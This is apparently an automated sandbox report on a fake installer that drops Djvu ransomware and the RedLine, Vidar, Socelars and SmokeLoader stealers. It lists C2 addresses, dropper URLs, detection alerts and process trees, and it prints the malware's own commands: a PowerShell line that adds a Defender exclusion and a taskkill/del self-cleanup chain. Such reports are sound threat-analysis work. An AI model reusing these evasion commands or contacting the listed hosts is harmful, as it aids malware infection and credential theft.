djvu | b41ece0fdbd279c8c8dd615981603fb4cb7052d28d26ce803fbeb0eef5ea01d2

Resubmissions

26-09-2021 14:47

210926-r55s4sehcp 10

24-09-2021 18:42

210924-xcn8jshegn 10

24-09-2021 17:31

210924-v36t6shdck 10

Analysis

max time kernel
79s
max time network
605s
platform
windows10_x64
resource
win10-ja-20210920
submitted
26-09-2021 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

6.5MB
MD5

745f2a6ae8c3bfce8fdde3d39d788ea7
SHA1

3d6ea6756f20c8e24286238e98209fb898fdb774
SHA256

b41ece0fdbd279c8c8dd615981603fb4cb7052d28d26ce803fbeb0eef5ea01d2
SHA512

7a553805571306d7c53675a4a752a6c63ae1f246a9fa5ce4e6c9729a010672ba48acb9d183715ab0496e54c13d04b7c6f35c8c79e3975bc20326c111d2f8bd37

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.top/welcome

Extracted

Family

redline

Botnet

matthew2009

213.166.69.181:64650

Extracted

Family

redline

Botnet

22.09

45.133.1.81:45269

Extracted

Family

redline

Botnet

janera

65.108.20.195:6774

Extracted

Family

smokeloader

Version

2020

http://govsurplusstore.com/upload/

http://best-forsale.com/upload/

http://chmxnautoparts.com/upload/

http://kwazone.com/upload/

rc4.i32

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5016 6036 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5016	6036	rundll32.exe

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral6/memory/4576-243-0x000000000041C5FA-mapping.dmp	family_redline
behavioral6/memory/4576-242-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral6/memory/2072-269-0x00000000030D0000-0x00000000030EF000-memory.dmp	family_redline
behavioral6/memory/2072-274-0x00000000050E0000-0x00000000050FE000-memory.dmp	family_redline
behavioral6/memory/4748-279-0x0000000003290000-0x00000000032AF000-memory.dmp	family_redline
behavioral6/memory/4748-283-0x0000000004B90000-0x0000000004BAE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15517df7a88264b6.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15517df7a88264b6.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral6/memory/1680-247-0x0000000002CF0000-0x0000000002E3A000-memory.dmp	family_vidar
behavioral6/memory/1680-264-0x0000000000400000-0x0000000002BFB000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\libcurl.dll	aspack_v212_v242

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

EtalevzaJet.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts EtalevzaJet.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	EtalevzaJet.exe

Executes dropped EXE 49 IoCs

Processes:

setup_installer.exesetup_install.exeFri158ea592d6f.exeFri156c10dd46.exeFri15cf751fee90f2.exeFri155e6d4468.exeFri15364050134.exeFri15d3a9f0cbde1.exeFri15c8bd2ae6f94f.exeFri15c47a7c807b12d1.exeFri1520f78358.exeFri1586c2482e5c8a45.exeFri157e966e73fe.exeFri1503acc0996b574.exeFri15517df7a88264b6.exeFri159afce91b41.exeFri1574d7b3751ed.exeFri1503acc0996b574.tmpFri15c47a7c807b12d1.exeEtalevzaJet.exeLzmwAqmV.exe2349725.scrLei.exe.comChrome 5.exePublicDwlBrowser1100.exe1443888.scrWinHoster.exebuild3.exeudptest.exe7955302.exe8423436.scrsfx_123_206.exe1845761.scr6.exeLivelyScreenRecorderF20.exesetup_2.exetingwang-game.exejhuuee.exesetup_2.tmpsetup_2.exesetup_2.tmp5449410.exeLzmwAqmV.exeConhost.exe3421873.exeservices64.exepostback.exe6878127.exe

pid	process
3208	setup_installer.exe
3420	setup_install.exe
1208	Fri158ea592d6f.exe
1468	Fri156c10dd46.exe
1680	Fri15cf751fee90f2.exe
1524	Fri155e6d4468.exe
1572	Fri15364050134.exe
1860	Fri15d3a9f0cbde1.exe
2072	Fri15c8bd2ae6f94f.exe
2476	Fri15c47a7c807b12d1.exe
2388	Fri1520f78358.exe
2940	Fri1586c2482e5c8a45.exe
2504	Fri157e966e73fe.exe
3876	Fri1503acc0996b574.exe
3488	Fri15517df7a88264b6.exe
4748	Fri159afce91b41.exe
4864	Fri1574d7b3751ed.exe
2688	Fri1503acc0996b574.tmp
4576	Fri15c47a7c807b12d1.exe
3788	EtalevzaJet.exe
1080	LzmwAqmV.exe
3376	2349725.scr
724	Lei.exe.com
1808	Chrome 5.exe
4144	PublicDwlBrowser1100.exe
492	1443888.scr
3480	WinHoster.exe
4340	build3.exe
4836	udptest.exe
932	7955302.exe
1884	8423436.scr
3280	sfx_123_206.exe
1168	1845761.scr
1712	6.exe
4480	LivelyScreenRecorderF20.exe
5196	setup_2.exe
5296	tingwang-game.exe
5388	jhuuee.exe
5412	setup_2.tmp
5676	setup_2.exe
5792	setup_2.tmp
600	5449410.exe
5280	LzmwAqmV.exe
4320	Conhost.exe
1372	3421873.exe
932	7955302.exe
2588	services64.exe
3344	postback.exe
5556	6878127.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1443888.scrFri158ea592d6f.exe8423436.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1443888.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8423436.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8423436.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1443888.scr

Loads dropped DLL 11 IoCs

Processes:

setup_install.exeFri1503acc0996b574.tmpsetup_2.tmpsetup_2.tmpLzmwAqmV.exe

pid	process
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
2688	Fri1503acc0996b574.tmp
5412	setup_2.tmp
5792	setup_2.tmp
5280	LzmwAqmV.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2920 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2920	icacls.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri158ea592d6f.exe	themida
C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri158ea592d6f.exe	themida
behavioral6/memory/1208-219-0x00000000000D0000-0x00000000000D1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Lei.exe.com

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Lei.exe.com

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 9 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

mshta.exeFri1503acc0996b574.tmpsfx_123_206.exe8423436.scrsetup_2.tmpmshta.exeFri158ea592d6f.exe1443888.scrLivelyScreenRecorderF20.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Fri1503acc0996b574.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sfx_123_206.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8423436.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1443888.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LivelyScreenRecorderF20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
92 ip-api.com
295 api.2ip.ua
296 api.2ip.ua
333 api.2ip.ua
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Fri158ea592d6f.exe1443888.scr8423436.scr

pid process

1208 Fri158ea592d6f.exe
492 1443888.scr
1884 8423436.scr
Suspicious use of SetThreadContext 1 IoCs

Processes:

Fri15c47a7c807b12d1.exe

description pid process target process

PID 2476 set thread context of 4576 2476 Fri15c47a7c807b12d1.exe Fri15c47a7c807b12d1.exe

flow	ioc
13	ip-api.com
92	ip-api.com
295	api.2ip.ua
296	api.2ip.ua
333	api.2ip.ua

description	pid	process	target process
PID 2476 set thread context of 4576	2476	Fri15c47a7c807b12d1.exe	Fri15c47a7c807b12d1.exe

Drops file in Program Files directory 3 IoCs

Processes:

setup_2.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-2DUSL.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2088	4864	WerFault.exe	Fri1574d7b3751ed.exe
4092	4864	WerFault.exe	Fri1574d7b3751ed.exe
5332	4864	WerFault.exe	Fri1574d7b3751ed.exe
5804	4864	WerFault.exe	Fri1574d7b3751ed.exe
2244	1712	WerFault.exe	6.exe
636	4864	WerFault.exe	Fri1574d7b3751ed.exe
6416	4864	WerFault.exe	Fri1574d7b3751ed.exe
6988	4864	WerFault.exe	Fri1574d7b3751ed.exe
7768	8048	WerFault.exe	GcleanerEU.exe
7184	8048	WerFault.exe	GcleanerEU.exe
7304	8048	WerFault.exe	GcleanerEU.exe
7704	8048	WerFault.exe	GcleanerEU.exe
3536	6148	WerFault.exe	gcleaner.exe
7184	6148	WerFault.exe	gcleaner.exe
7716	8048	WerFault.exe	GcleanerEU.exe
8096	6148	WerFault.exe	gcleaner.exe
7704	6148	WerFault.exe	gcleaner.exe
7624	8048	WerFault.exe	GcleanerEU.exe
6156	8048	WerFault.exe	GcleanerEU.exe
3844	6148	WerFault.exe	gcleaner.exe
3316	6148	WerFault.exe	gcleaner.exe
6880	6148	WerFault.exe	gcleaner.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

PING.EXE

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PING.EXE
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PING.EXE

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

7704 schtasks.exe
5428 schtasks.exe
4232 schtasks.exe
5684 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2520 timeout.exe
7604 timeout.exe
5572 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

4708 bitsadmin.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

7556 taskkill.exe
4296 taskkill.exe
2440 taskkill.exe
5764 taskkill.exe
4268 taskkill.exe
3552 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2940 PING.EXE

pid	process
7704	schtasks.exe
5428	schtasks.exe
4232	schtasks.exe
5684	schtasks.exe

pid	process
2520	timeout.exe
7604	timeout.exe
5572	timeout.exe

pid	process
4708	bitsadmin.exe

pid	process
7556	taskkill.exe
4296	taskkill.exe
2440	taskkill.exe
5764	taskkill.exe
4268	taskkill.exe
3552	taskkill.exe

pid	process
2940	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Fri158ea592d6f.exemsiexec.exePING.EXE2349725.scrcmd.exe

pid	process
1208	Fri158ea592d6f.exe
1208	Fri158ea592d6f.exe
2572	msiexec.exe
2572	msiexec.exe
2572	msiexec.exe
2940	PING.EXE
2940	PING.EXE
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2360
2572	msiexec.exe
2572	msiexec.exe
2360
2360
3376	2349725.scr
3376	2349725.scr
2360
2360
2360
2360
2360
2360
2360
2360
2088	cmd.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

PING.EXE

pid process

2940 PING.EXE
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

3421873.exe

pid process

1372 3421873.exe

pid	process
2940	PING.EXE

pid	process
1372	3421873.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Fri155e6d4468.exeFri15517df7a88264b6.exeFri157e966e73fe.exepowershell.execmd.exe2349725.scrPublicDwlBrowser1100.exe7955302.exeWerFault.exe6.exeFri158ea592d6f.exeFri15c47a7c807b12d1.exe1845761.scrWerFault.exeFri15c8bd2ae6f94f.exeFri159afce91b41.exe

description	pid	process
Token: SeDebugPrivilege	1524	Fri155e6d4468.exe
Token: SeCreateTokenPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeAssignPrimaryTokenPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeLockMemoryPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeIncreaseQuotaPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeMachineAccountPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeTcbPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeSecurityPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeTakeOwnershipPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeLoadDriverPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeSystemProfilePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeSystemtimePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeProfSingleProcessPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeIncBasePriorityPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeCreatePagefilePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeCreatePermanentPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeBackupPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeRestorePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeShutdownPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeDebugPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeAuditPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeSystemEnvironmentPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeChangeNotifyPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeRemoteShutdownPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeUndockPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeSyncAgentPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeEnableDelegationPrivilege	3488	Fri15517df7a88264b6.exe
Token: SeManageVolumePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeImpersonatePrivilege	3488	Fri15517df7a88264b6.exe
Token: SeCreateGlobalPrivilege	3488	Fri15517df7a88264b6.exe
Token: 31	3488	Fri15517df7a88264b6.exe
Token: 32	3488	Fri15517df7a88264b6.exe
Token: 33	3488	Fri15517df7a88264b6.exe
Token: 34	3488	Fri15517df7a88264b6.exe
Token: 35	3488	Fri15517df7a88264b6.exe
Token: SeDebugPrivilege	2504	Fri157e966e73fe.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeRestorePrivilege	2088	cmd.exe
Token: SeBackupPrivilege	2088	cmd.exe
Token: SeDebugPrivilege	3376	2349725.scr
Token: SeDebugPrivilege	2088	cmd.exe
Token: SeDebugPrivilege	4144	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeDebugPrivilege	932	7955302.exe
Token: SeDebugPrivilege	4092	WerFault.exe
Token: SeDebugPrivilege	1712	6.exe
Token: SeDebugPrivilege	1208	Fri158ea592d6f.exe
Token: SeDebugPrivilege	4576	Fri15c47a7c807b12d1.exe
Token: SeDebugPrivilege	1168	1845761.scr
Token: SeDebugPrivilege	5332	WerFault.exe
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeShutdownPrivilege	2360
Token: SeCreatePagefilePrivilege	2360
Token: SeDebugPrivilege	2072	Fri15c8bd2ae6f94f.exe
Token: SeDebugPrivilege	4748	Fri159afce91b41.exe
Token: SeShutdownPrivilege	2360

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

setup_2.tmp

pid process

5792 setup_2.tmp

pid	process
5792	setup_2.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2176 wrote to memory of 3208	2176	setup_x86_x64_install.exe	setup_installer.exe
PID 2176 wrote to memory of 3208	2176	setup_x86_x64_install.exe	setup_installer.exe
PID 2176 wrote to memory of 3208	2176	setup_x86_x64_install.exe	setup_installer.exe
PID 3208 wrote to memory of 3420	3208	setup_installer.exe	setup_install.exe
PID 3208 wrote to memory of 3420	3208	setup_installer.exe	setup_install.exe
PID 3208 wrote to memory of 3420	3208	setup_installer.exe	setup_install.exe
PID 3420 wrote to memory of 4332	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4332	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4332	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4244	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4244	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4244	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4268	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4268	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4268	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4324	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4324	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4324	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4388	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4388	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4388	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 528	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 528	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 528	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 3300	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 3300	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 3300	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4316	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4316	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4316	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4216	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4216	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 4216	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 868	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 868	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 868	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 356	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 356	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 356	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 960	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 960	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 960	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1072	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1072	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1072	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1256	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1256	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1256	3420	setup_install.exe	cmd.exe
PID 4388 wrote to memory of 1208	4388	cmd.exe	Fri158ea592d6f.exe
PID 4388 wrote to memory of 1208	4388	cmd.exe	Fri158ea592d6f.exe
PID 4388 wrote to memory of 1208	4388	cmd.exe	Fri158ea592d6f.exe
PID 3420 wrote to memory of 1308	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1308	3420	setup_install.exe	cmd.exe
PID 3420 wrote to memory of 1308	3420	setup_install.exe	cmd.exe
PID 528 wrote to memory of 1468	528	cmd.exe	Fri156c10dd46.exe
PID 528 wrote to memory of 1468	528	cmd.exe	Fri156c10dd46.exe
PID 3300 wrote to memory of 1524	3300	cmd.exe	Fri155e6d4468.exe
PID 3300 wrote to memory of 1524	3300	cmd.exe	Fri155e6d4468.exe
PID 4244 wrote to memory of 1680	4244	cmd.exe	Fri15cf751fee90f2.exe
PID 4244 wrote to memory of 1680	4244	cmd.exe	Fri15cf751fee90f2.exe
PID 4244 wrote to memory of 1680	4244	cmd.exe	Fri15cf751fee90f2.exe
PID 4268 wrote to memory of 1572	4268	cmd.exe	Fri15364050134.exe
PID 4268 wrote to memory of 1572	4268	cmd.exe	Fri15364050134.exe
PID 4268 wrote to memory of 1572	4268	cmd.exe	Fri15364050134.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3208

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
PID:4332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15cf751fee90f2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4244

C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15cf751fee90f2.exe
Fri15cf751fee90f2.exe
5⤵
- Executes dropped EXE
PID:1680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Fri15cf751fee90f2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS88C1AAD2\Fri15cf751fee90f2.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:7068

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Fri15cf751fee90f2.exe /f
7⤵
- Kills process with taskkill
PID:5764

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:2520

C:\Windows\SysWOW64\cmd.exe
